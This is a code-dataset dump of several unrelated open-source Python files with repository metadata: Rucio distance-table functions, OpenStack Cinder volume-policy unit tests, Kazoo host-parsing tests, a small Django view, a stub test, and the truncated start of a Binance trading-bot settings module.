| 0
| 0
|
0
| 7
|
6ac36a37bce4ddf97c94d96a98102176f019a0ab
| 6,526
|
py
|
Python
|
lib/rucio/core/distance.py
|
balrampariyarath/rucio
|
8a68017af6b44485a9620566f1afc013838413c1
|
[
"Apache-2.0"
] | 1
|
2017-08-07T13:34:55.000Z
|
2017-08-07T13:34:55.000Z
|
lib/rucio/core/distance.py
|
balrampariyarath/rucio
|
8a68017af6b44485a9620566f1afc013838413c1
|
[
"Apache-2.0"
] | null | null | null |
lib/rucio/core/distance.py
|
balrampariyarath/rucio
|
8a68017af6b44485a9620566f1afc013838413c1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Wen Guan, <wen.guan@cern.ch>, 2015-2016
from sqlalchemy.exc import DatabaseError, IntegrityError
from rucio.common import exception
from rucio.db.sqla.models import Distance
from rucio.db.sqla.session import transactional_session, read_session
@transactional_session
def add_distance(src_rse_id, dest_rse_id, ranking=None, agis_distance=None, geoip_distance=None,
active=None, submitted=None, finished=None, failed=None, transfer_speed=None, session=None):
"""
Add a src-dest distance.
:param src_rse_id: The source RSE ID.
:param dest_rse_id: The destination RSE ID.
:param ranking: Ranking as an integer.
:param agis_distance: AGIS Distance as an integer.
:param geoip_distance: GEOIP Distance as an integer.
:param active: Active FTS transfers as an integer.
:param submitted: Submitted FTS transfers as an integer.
:param finished: Finished FTS transfers as an integer.
:param failed: Failed FTS transfers as an integer.
:param transfer_speed: FTS transfer speed as an integer.
:param session: The database session to use.
"""
try:
new_distance = Distance(src_rse_id=src_rse_id, dest_rse_id=dest_rse_id, ranking=ranking, agis_distance=agis_distance, geoip_distance=geoip_distance,
active=active, submitted=submitted, finished=finished, failed=failed, transfer_speed=transfer_speed)
new_distance.save(session=session)
except IntegrityError:
raise exception.Duplicate('Distance from %s to %s already exists!' % (src_rse_id, dest_rse_id))
except DatabaseError, e:
raise exception.RucioException(e.args)
@transactional_session
def add_distance_short(src_rse_id, dest_rse_id, distance=None, session=None):
"""
Add a src-dest distance.
:param src_rse_id: The source RSE ID.
:param dest_rse_id: The destination RSE ID.
:param distance: A dictionary with different values.
"""
add_distance(src_rse_id, dest_rse_id, ranking=distance.get('ranking', None), agis_distance=distance.get('agis_distance', None),
geoip_distance=distance.get('geoip_distance', None), active=distance.get('active', None), submitted=distance.get('submitted', None),
finished=distance.get('finished', None), failed=distance.get('failed', None), transfer_speed=distance.get('transfer_speed', None),
session=session)
@read_session
def get_distances(src_rse_id=None, dest_rse_id=None, session=None):
"""
Get distances between rses.
:param src_rse_id: The source RSE ID.
:param dest_rse_id: The destination RSE ID.
:param session: The database session to use.
:returns distance: List of dictionaries.
"""
try:
query = session.query(Distance)
if src_rse_id:
query = query.filter(Distance.src_rse_id == src_rse_id)
if dest_rse_id:
query = query.filter(Distance.dest_rse_id == dest_rse_id)
distances = []
tmp = query.all()
if tmp:
for t in tmp:
t2 = dict(t)
t2.pop('_sa_instance_state')
distances.append(t2)
return distances
except IntegrityError, e:
raise exception.RucioException(e.args)
@transactional_session
def delete_distances(src_rse_id=None, dest_rse_id=None, session=None):
"""
Delete distances with the given RSE ids.
:param src_rse_id: The source RSE ID.
:param dest_rse_id: The destination RSE ID.
:param session: The database session to use.
"""
try:
query = session.query(Distance)
if src_rse_id:
query = query.filter(Distance.src_rse_id == src_rse_id)
if dest_rse_id:
query = query.filter(Distance.dest_rse_id == dest_rse_id)
query.delete()
except IntegrityError, e:
raise exception.RucioException(e.args)
@transactional_session
def update_distances(src_rse_id=None, dest_rse_id=None, ranking=None, agis_distance=None, geoip_distance=None,
active=None, submitted=None, finished=None, failed=None, transfer_speed=None, session=None):
"""
Update distances with the given RSE ids.
:param src_rse_id: The source RSE ID.
:param dest_rse_id: The destination RSE ID.
:param ranking: Ranking as an integer.
:param agis_distance: AGIS Distance as an integer.
:param geoip_distance: GEOIP Distance as an integer.
:param active: Active FTS transfers as an integer.
:param submitted: Submitted FTS transfers as an integer.
:param finished: Finished FTS transfers as an integer.
:param failed: Failed FTS transfers as an integer.
:param transfer_speed: FTS transfer speed as an integer.
:param session: The database session to use.
"""
try:
distance = {'ranking': ranking, 'agis_distance': agis_distance, 'geoip_distance': geoip_distance,
'active': active, 'submitted': submitted, 'finished': finished, 'failed': failed,
'transfer_speed': transfer_speed}
query = session.query(Distance)
if src_rse_id:
query = query.filter(Distance.src_rse_id == src_rse_id)
if dest_rse_id:
query = query.filter(Distance.dest_rse_id == dest_rse_id)
query.update(distance)
except IntegrityError, e:
raise exception.RucioException(e.args)
@transactional_session
def update_distances_short(src_rse_id=None, dest_rse_id=None, distance=None, session=None):
"""
Update distances with the given RSE ids.
:param src_rse_id: The source RSE ID.
:param dest_rse_id: The destination RSE ID.
:param distance: A dictionary with different values.
"""
update_distances(src_rse_id, dest_rse_id, ranking=distance.get('ranking', None), agis_distance=distance.get('agis_distance', None),
geoip_distance=distance.get('geoip_distance', None), active=distance.get('active', None), submitted=distance.get('submitted', None),
finished=distance.get('finished', None), failed=distance.get('failed', None), transfer_speed=distance.get('transfer_speed', None),
session=session)
| 38.845238
| 156
| 0.690622
| 872
| 6,526
| 4.981651
| 0.139908
| 0.073665
| 0.047882
| 0.058932
| 0.818831
| 0.807551
| 0.79558
| 0.790055
| 0.7843
| 0.756446
| 0
| 0.002933
| 0.216212
| 6,526
| 167
| 157
| 39.077844
| 0.846334
| 0.049341
| 0
| 0.549296
| 0
| 0
| 0.069847
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.056338
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6aed615c6a4d7d3cb0a3f9a1cf9c03e626297c17
| 160
|
py
|
Python
|
seaobs/tests/test_turbulence.py
|
serazing/seaobs
|
99483723b541e738adea4ce497f73d2b5d8e1198
|
[
"MIT"
] | null | null | null |
seaobs/tests/test_turbulence.py
|
serazing/seaobs
|
99483723b541e738adea4ce497f73d2b5d8e1198
|
[
"MIT"
] | null | null | null |
seaobs/tests/test_turbulence.py
|
serazing/seaobs
|
99483723b541e738adea4ce497f73d2b5d8e1198
|
[
"MIT"
] | null | null | null |
from .. import turbulence as turb
def test_structure_function():
#TODO
#turb.structure_function()
pass
def test_inputs_structure_function():
#TODO
pass
| 13.333333
| 37
| 0.76875
| 21
| 160
| 5.571429
| 0.571429
| 0.435897
| 0.358974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.14375
| 160
| 12
| 38
| 13.333333
| 0.854015
| 0.20625
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0
| 1
| 0.4
| true
| 0.4
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
0aa2266c166297935be27de7e2f3252a5bf6f277
| 20,510
|
py
|
Python
|
cinder/tests/unit/policies/test_volume.py
|
xin3liang/cinder
|
61e24eb8ab986f82f4c223fb82062edd489fec15
|
[
"Apache-2.0"
] | 1
|
2020-08-14T02:20:57.000Z
|
2020-08-14T02:20:57.000Z
|
cinder/tests/unit/policies/test_volume.py
|
BelieveInFuture/cinder
|
fff95fa6a68a054488ee087b6e31f4f5e28209dc
|
[
"Apache-2.0"
] | null | null | null |
cinder/tests/unit/policies/test_volume.py
|
BelieveInFuture/cinder
|
fff95fa6a68a054488ee087b6e31f4f5e28209dc
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from six.moves import http_client
from cinder.tests.unit import fake_constants
from cinder.tests.unit.policies import test_base
from cinder.volume import api as volume_api
# TODO(yikun): The below policy test cases should be added:
# * HOST_ATTRIBUTE_POLICY
# * MIG_ATTRIBUTE_POLICY
# * ENCRYPTION_METADATA_POLICY
# * MULTIATTACH_POLICY
class VolumePolicyTests(test_base.CinderPolicyTests):
def test_admin_can_create_volume(self):
admin_context = self.admin_context
path = '/v3/%(project_id)s/volumes' % {
'project_id': admin_context.project_id
}
body = {"volume": {"size": 1}}
response = self._get_request_response(admin_context, path, 'POST',
body=body)
self.assertEqual(http_client.ACCEPTED, response.status_int)
def test_nonadmin_user_can_create_volume(self):
user_context = self.user_context
path = '/v3/%(project_id)s/volumes' % {
'project_id': user_context.project_id
}
body = {"volume": {"size": 1}}
response = self._get_request_response(user_context, path, 'POST',
body=body)
self.assertEqual(http_client.ACCEPTED, response.status_int)
def test_admin_can_create_volume_from_image(self):
admin_context = self.admin_context
path = '/v3/%(project_id)s/volumes' % {
'project_id': admin_context.project_id
}
body = {"volume": {"size": 1, "image_id": fake_constants.IMAGE_ID}}
response = self._get_request_response(admin_context, path, 'POST',
body=body)
self.assertEqual(http_client.ACCEPTED, response.status_int)
def test_nonadmin_user_can_create_volume_from_image(self):
user_context = self.user_context
path = '/v3/%(project_id)s/volumes' % {
'project_id': user_context.project_id
}
body = {"volume": {"size": 1, "image_id": fake_constants.IMAGE_ID}}
response = self._get_request_response(user_context, path, 'POST',
body=body)
self.assertEqual(http_client.ACCEPTED, response.status_int)
@mock.patch.object(volume_api.API, 'get_volume')
def test_admin_can_show_volumes(self, mock_volume):
# Make sure administrators are authorized to list volumes
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(admin_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
self.assertEqual(response.json_body['volume']['id'], volume.id)
@mock.patch.object(volume_api.API, 'get_volume')
def test_owner_can_show_volumes(self, mock_volume):
# Make sure owners are authorized to list their volumes
user_context = self.user_context
volume = self._create_fake_volume(user_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(user_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
self.assertEqual(response.json_body['volume']['id'], volume.id)
@mock.patch.object(volume_api.API, 'get_volume')
def test_owner_cannot_show_volumes_for_others(self, mock_volume):
# Make sure volumes are only exposed to their owners
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(non_owner_context, path, 'GET')
# NOTE(lbragstad): Technically, this user isn't supposed to see this
# volume, because they didn't create it and it lives in a different
# project. Does cinder return a 404 in cases like this? Or is a 403
# expected?
self.assertEqual(http_client.NOT_FOUND, response.status_int)
def test_admin_can_get_all_volumes_detail(self):
# Make sure administrators are authorized to list volumes
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context)
path = '/v3/%(project_id)s/volumes/detail' % {
'project_id': admin_context.project_id
}
response = self._get_request_response(admin_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_vol = response.json_body['volumes'][0]
self.assertEqual(volume.id, res_vol['id'])
def test_owner_can_get_all_volumes_detail(self):
# Make sure owners are authorized to list volumes
user_context = self.user_context
volume = self._create_fake_volume(user_context)
path = '/v3/%(project_id)s/volumes/detail' % {
'project_id': user_context.project_id
}
response = self._get_request_response(user_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_vol = response.json_body['volumes'][0]
self.assertEqual(volume.id, res_vol['id'])
@mock.patch.object(volume_api.API, 'get')
def test_admin_can_update_volumes(self, mock_volume):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
body = {"volume": {"name": "update_name"}}
response = self._get_request_response(admin_context, path, 'PUT',
body=body)
self.assertEqual(http_client.OK, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_can_update_volumes(self, mock_volume):
user_context = self.user_context
volume = self._create_fake_volume(user_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
body = {"volume": {"name": "update_name"}}
response = self._get_request_response(user_context, path, 'PUT',
body=body)
self.assertEqual(http_client.OK, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_update_volumes_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
body = {"volume": {"name": "update_name"}}
response = self._get_request_response(non_owner_context, path, 'PUT',
body=body)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_can_delete_volumes(self, mock_volume):
user_context = self.user_context
volume = self._create_fake_volume(user_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(user_context, path, 'DELETE')
self.assertEqual(http_client.ACCEPTED, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_admin_can_delete_volumes(self, mock_volume):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(admin_context, path, 'DELETE')
self.assertEqual(http_client.ACCEPTED, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_delete_volumes_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(non_owner_context, path,
'DELETE')
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(volume_api.API, 'get_volume')
def test_admin_can_show_tenant_id_in_volume(self, mock_volume):
# Make sure administrators are authorized to show tenant_id
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(admin_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_vol = response.json_body['volume']
self.assertEqual(admin_context.project_id,
res_vol['os-vol-tenant-attr:tenant_id'])
@mock.patch.object(volume_api.API, 'get_volume')
def test_owner_can_show_tenant_id_in_volume(self, mock_volume):
# Make sure owners are authorized to show tenant_id in volume
user_context = self.user_context
volume = self._create_fake_volume(user_context)
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(user_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_vol = response.json_body['volume']
self.assertEqual(user_context.project_id,
res_vol['os-vol-tenant-attr:tenant_id'])
def test_admin_can_show_tenant_id_in_volume_detail(self):
# Make sure admins are authorized to show tenant_id in volume detail
admin_context = self.admin_context
self._create_fake_volume(admin_context)
path = '/v3/%(project_id)s/volumes/detail' % {
'project_id': admin_context.project_id
}
response = self._get_request_response(admin_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_vol = response.json_body['volumes'][0]
# Make sure owners are authorized to show tenant_id
self.assertEqual(admin_context.project_id,
res_vol['os-vol-tenant-attr:tenant_id'])
def test_owner_can_show_tenant_id_in_volume_detail(self):
# Make sure owners are authorized to show tenant_id in volume detail
user_context = self.user_context
self._create_fake_volume(user_context)
path = '/v3/%(project_id)s/volumes/detail' % {
'project_id': user_context.project_id
}
response = self._get_request_response(user_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_vol = response.json_body['volumes'][0]
# Make sure owners are authorized to show tenant_id
self.assertEqual(user_context.project_id,
res_vol['os-vol-tenant-attr:tenant_id'])
def test_admin_can_create_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k1": "v1"}}
response = self._get_request_response(admin_context, path, 'POST',
body=body)
self.assertEqual(http_client.OK, response.status_int)
def test_admin_can_get_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(admin_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v', res_meta['k'])
def test_admin_can_update_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k": "v2"}}
response = self._get_request_response(admin_context, path, 'PUT',
body=body)
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v2', res_meta['k'])
def test_admin_can_delete_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata/%(key)s' % {
'project_id': admin_context.project_id, 'volume_id': volume.id,
'key': 'k'
}
response = self._get_request_response(admin_context, path, 'DELETE')
self.assertEqual(http_client.OK, response.status_int)
def test_owner_can_create_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k1": "v1"}}
response = self._get_request_response(user_context, path, 'POST',
body=body)
self.assertEqual(http_client.OK, response.status_int)
def test_owner_can_get_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(user_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v', res_meta['k'])
def test_owner_can_update_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k": "v2"}}
response = self._get_request_response(user_context, path, 'PUT',
body=body)
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v2', res_meta['k'])
def test_owner_can_delete_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata/%(key)s' % {
'project_id': user_context.project_id, 'volume_id': volume.id,
'key': 'k'
}
response = self._get_request_response(user_context, path, 'DELETE')
self.assertEqual(http_client.OK, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_create_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k1": "v1"}}
response = self._get_request_response(non_owner_context, path, 'POST',
body=body)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_get_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(non_owner_context, path, 'GET')
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_update_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k": "v2"}}
response = self._get_request_response(non_owner_context, path, 'PUT',
body=body)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_delete_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata/%(key)s' % {
'project_id': non_owner_context.project_id,
'volume_id': volume.id,
'key': 'k'
}
response = self._get_request_response(non_owner_context, path,
'DELETE')
self.assertEqual(http_client.FORBIDDEN, response.status_int)
| 41.686992
| 78
| 0.650366
| 2,577
| 20,510
| 4.838184
| 0.069849
| 0.070019
| 0.038499
| 0.037295
| 0.918431
| 0.909849
| 0.899984
| 0.896134
| 0.885306
| 0.872393
| 0
| 0.003847
| 0.239542
| 20,510
| 491
| 79
| 41.771894
| 0.795538
| 0.074451
| 0
| 0.782235
| 0
| 0
| 0.129044
| 0.07389
| 0
| 0
| 0
| 0.002037
| 0.13467
| 1
| 0.088825
| false
| 0
| 0.014327
| 0
| 0.106017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0aaddf688c3f1011c2bf5fdafe2edce62af3c351
| 149
|
py
|
Python
|
gerenciador_tarefas/aplicativo/views.py
|
GePajarinen/Django-App
|
cb5cc13fe560a1a929ccd1f88f45219f60e68c43
|
[
"MIT"
] | 1
|
2020-06-24T13:23:30.000Z
|
2020-06-24T13:23:30.000Z
|
gerenciador_tarefas/aplicativo/views.py
|
GePajarinen/Django-App
|
cb5cc13fe560a1a929ccd1f88f45219f60e68c43
|
[
"MIT"
] | null | null | null |
gerenciador_tarefas/aplicativo/views.py
|
GePajarinen/Django-App
|
cb5cc13fe560a1a929ccd1f88f45219f60e68c43
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def listar_tarefas(request):
return render(request, 'tarefas/listar_tarefas.html')
| 29.8
| 57
| 0.791946
| 20
| 149
| 5.8
| 0.75
| 0.224138
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120805
| 149
| 5
| 57
| 29.8
| 0.885496
| 0.154362
| 0
| 0
| 0
| 0
| 0.216
| 0.216
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
0ad83cf50e428b39181bd5ffedea399d85a31c55
| 1,946
|
py
|
Python
|
desktop/core/ext-py/kazoo-2.8.0/kazoo/tests/test_hosts.py
|
yetsun/hue
|
2e48f0cc70e233ee0e1b40733d4b2a18d8836c66
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
desktop/core/ext-py/kazoo-2.8.0/kazoo/tests/test_hosts.py
|
yetsun/hue
|
2e48f0cc70e233ee0e1b40733d4b2a18d8836c66
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
desktop/core/ext-py/kazoo-2.8.0/kazoo/tests/test_hosts.py
|
yetsun/hue
|
2e48f0cc70e233ee0e1b40733d4b2a18d8836c66
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
from unittest import TestCase
from kazoo.hosts import collect_hosts
class HostsTestCase(TestCase):
def test_ipv4(self):
hosts, chroot = collect_hosts('127.0.0.1:2181, 192.168.1.2:2181, \
132.254.111.10:2181')
assert hosts == [('127.0.0.1', 2181),
('192.168.1.2', 2181),
('132.254.111.10', 2181)]
assert chroot is None
hosts, chroot = collect_hosts(['127.0.0.1:2181',
'192.168.1.2:2181',
'132.254.111.10:2181'])
assert hosts == [('127.0.0.1', 2181),
('192.168.1.2', 2181),
('132.254.111.10', 2181)]
assert chroot is None
def test_ipv6(self):
hosts, chroot = collect_hosts('[fe80::200:5aee:feaa:20a2]:2181')
assert hosts == [('fe80::200:5aee:feaa:20a2', 2181)]
assert chroot is None
hosts, chroot = collect_hosts(['[fe80::200:5aee:feaa:20a2]:2181'])
assert hosts == [('fe80::200:5aee:feaa:20a2', 2181)]
assert chroot is None
def test_hosts_list(self):
hosts, chroot = collect_hosts('zk01:2181, zk02:2181, zk03:2181')
expected1 = [('zk01', 2181), ('zk02', 2181), ('zk03', 2181)]
assert hosts == expected1
assert chroot is None
hosts, chroot = collect_hosts(['zk01:2181', 'zk02:2181', 'zk03:2181'])
assert hosts == expected1
assert chroot is None
expected2 = '/test'
hosts, chroot = collect_hosts('zk01:2181, zk02:2181, zk03:2181/test')
assert hosts == expected1
assert chroot == expected2
hosts, chroot = collect_hosts(['zk01:2181',
'zk02:2181',
'zk03:2181', '/test'])
assert hosts == expected1
assert chroot == expected2
| 36.037037
| 78
| 0.511305
| 227
| 1,946
| 4.325991
| 0.176211
| 0.101833
| 0.14664
| 0.187373
| 0.867617
| 0.855397
| 0.855397
| 0.841141
| 0.841141
| 0.841141
| 0
| 0.23622
| 0.347379
| 1,946
| 53
| 79
| 36.716981
| 0.537008
| 0
| 0
| 0.487805
| 0
| 0.02439
| 0.190134
| 0.056526
| 0
| 0
| 0
| 0
| 0.390244
| 1
| 0.073171
| false
| 0
| 0.04878
| 0
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7c4cea4e7559479623c337d018dd5c6cf38e7c74
| 9,347
|
py
|
Python
|
bot/dynamics.py
|
carden-code/Binance-Trading-Bot
|
25756cfc1ec07b777e32ea8c2d08d2a460cba08a
|
[
"MIT"
] | 17
|
2021-07-15T19:57:33.000Z
|
2022-01-19T13:32:44.000Z
|
bot/dynamics.py
|
amin-IT/Binance-volatility-trading-bot
|
5648f393abb93ec1b9899205787f1881cbf6e37e
|
[
"MIT"
] | null | null | null |
bot/dynamics.py
|
amin-IT/Binance-volatility-trading-bot
|
5648f393abb93ec1b9899205787f1881cbf6e37e
|
[
"MIT"
] | 5
|
2021-07-30T07:09:37.000Z
|
2021-11-04T14:14:04.000Z
|
import os
# use if needed to pass args to external modules
import sys
# used for directory handling
import glob
import time
import threading
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds, test_api_key,
load_telegram_creds
)
from bot.settings import *
def dynamic_settings(type, TIME_DIFFERENCE, RECHECK_INTERVAL):
global session_struct, settings_struct, trading_struct
STOP_LOSS = parsed_config['trading_options']['STOP_LOSS']
TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS']
TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
DYNAMIC_MIN_MAX = parsed_config['trading_options']['DYNAMIC_MIN_MAX']
HOLDING_PRICE_THRESHOLD = parsed_config['trading_options']['HOLDING_PRICE_THRESHOLD']
if DYNAMIC_SETTINGS:
#limiting STOP_LOSS TIME_DIFFERENCE and TRAILING_STOP_LOSS to dynamic min and max values
if settings_struct['STOP_LOSS'] < STOP_LOSS / DYNAMIC_MIN_MAX:
